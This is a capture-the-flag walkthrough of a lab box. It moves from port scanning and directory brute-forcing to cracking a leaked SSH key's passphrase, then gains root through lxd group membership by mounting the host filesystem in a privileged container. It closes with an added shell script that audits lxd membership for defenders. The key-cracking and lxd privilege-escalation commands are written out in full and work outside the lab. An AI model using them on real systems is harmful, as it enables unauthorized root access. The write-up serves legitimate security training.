Let’s start with a port scan to see what ports are open
So we have an SSH server running on port 22 and an Apache web server running on port 80. The name of the web site is “House of danak”. The operating system is Ubuntu.
Looking through the page source we find a comment that gives us a possible username, “john”.
Navigating to “DRAAGAN LORE” we are presented with an “Upload” button, which takes us to the following screen:
Here we have a list of files, which we will download using wget for further enumeration.
Dict.lst: This appears to be either a list of possible directories or a list of passwords; we will copy and paste it into a file using Vi.
Manifesto.txt: This appears to be a text file containing the manifesto of a hacker.
Meme.jpg: A JPG file, which may contain steganography; however a quick check using strings, Exiftool and Binwalk did not find anything. There may be hidden information we can extract with Steghide, but if there is we need a passphrase. Running Stegcracker with the rockyou wordlist also did not find a passphrase.
Searching for hidden directories with Gobuster:
Using both the Dict.lst file and the common DirBuster directory list, I searched for hidden directories with Gobuster.
We find /uploads, which we have already explored, and a new directory called /***** (directory name obscured).
/******:
Downloading the SecretKey, we find an RSA private key. I will chmod 600 this key for future use with the SSH server:
Could we use this private key with user john to access the SSH server?
ssh -i secretKey john@10.10.218.145
Unfortunately we need the passphrase for the key, so it is time to brute-force the passphrase of the id_rsa private key. We can do this using John the Ripper, but first we will need to convert the private id_rsa key to a format John can work with, using ssh2john.py.
python /usr/share/ssh2john.py secretKey > id_rsa.hash
We can now use John to brute-force the passphrase. To start with I will use the dict.lst file we downloaded earlier; if this does not work, we can move on to the rockyou wordlist.
john --wordlist=dict.lst id_rsa.hash
We have our passphrase and can now attempt to log in to the SSH server as john.
ssh -i secretKey john@10.10.218.145
And we are in as user john. From here we can get the user.txt flag from john’s home directory.
Privesc to Root:
The first thing is that the box tags for Gaming Server reference lxd, so my initial assumption is that we are in a container and we need to break out. Having previously done a similar box where the privesc involved breaking out of an lxd container, I have a good idea of how to do this.
Running id, we can see that john is a member of the lxd group, so without any further enumeration I will start a privesc via lxd.
To start with we need to download the lxd-alpine image builder to our local machine:
We can either download this from the GitHub repository or use git clone from the command line. We will use git clone:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd into the “lxd-alpine-builder” directory and run the “build-alpine” script with the following command:
sudo ./build-alpine -a i686
When you ls the directory you will see that you have the image file with the .gz extension. Next we need to set up a simple HTTP server and upload the image file to the remote machine.
We can use wget on the remote machine to fetch the .gz file.
Once uploaded we next need to import the image into lxd.
lxc image import alpine-v3.12-i686-20200831_1748.tar.gz --alias alpine
If we use the command, “lxc image list”, we can see that the image is now available on lxd:
We now need to create a machine from the image. This can be done by running the following command:
lxc init alpine privesc -c security.privileged=true
Here alpine is the image alias and privesc is what I am calling the machine.
If we use the command “lxc list”, we can now see the machine with the name privesc.
Next we need to add a disk device to the machine. The privesc technique in this case mounts the whole host filesystem at /mnt/root inside the privileged container, which gives us root access to it. We can achieve this with the following command:
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
As noted above the machine privesc is currently stopped, so we will need to start it with the following command:
lxc start privesc
To get a shell inside the container, we run the following command:
lxc exec privesc /bin/sh
All we have to do now is grab the root.txt flag and we are done:
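The root cause of this privesc is that an ordinary user holds lxd group membership. As an added defender-side check that is not part of the original writeup, here is a POSIX shell audit of who holds that membership; it reads an /etc/group-formatted file (the live /etc/group by default) and the sample group data is constructed, not taken from the box.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit an /etc/group-style file for
# members of the lxd group. As the privesc above shows, lxd membership lets a user mount
# the host filesystem into a privileged container, so it should be treated as root-equivalent.

# Constructed sample group data standing in for /etc/group (not taken from the target box).
SAMPLE_GROUP='root:x:0:
sudo:x:27:admin
lxd:x:108:john,alice
docker:x:999:'

# Print the comma-separated member list of the lxd group from the group file given as $1
# (defaults to the live /etc/group).
lxd_members() {
  awk -F: '$1 == "lxd" { print $4 }' "${1:-/etc/group}"
}

# Report lxd members one per line. Returns 0 when the group is empty and 1 when any
# user holds it, so the function can drive a compliance check.
audit_lxd_group() {
  members=$(lxd_members "$1")
  if [ -z "$members" ]; then
    echo "OK: lxd group has no members"
    return 0
  fi
  echo "RISK: these users can gain root through a privileged lxd container:"
  echo "$members" | tr ',' '\n' | sed 's/^/  - /'
  echo "Remediation: remove them from the group (e.g. gpasswd -d USER lxd) or limit lxd to root."
  return 1
}

# Stand-alone demo against the constructed sample.
tmp=$(mktemp)
printf '%s\n' "$SAMPLE_GROUP" > "$tmp"
audit_lxd_group "$tmp" || true
rm -f "$tmp"
```

Run it without arguments on a host to check the real /etc/group; a non-zero exit means someone besides root can reach root through lxd.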
A great box, and it has been some time since I have done an lxc privesc. Thank you to SuitGuy for developing this box.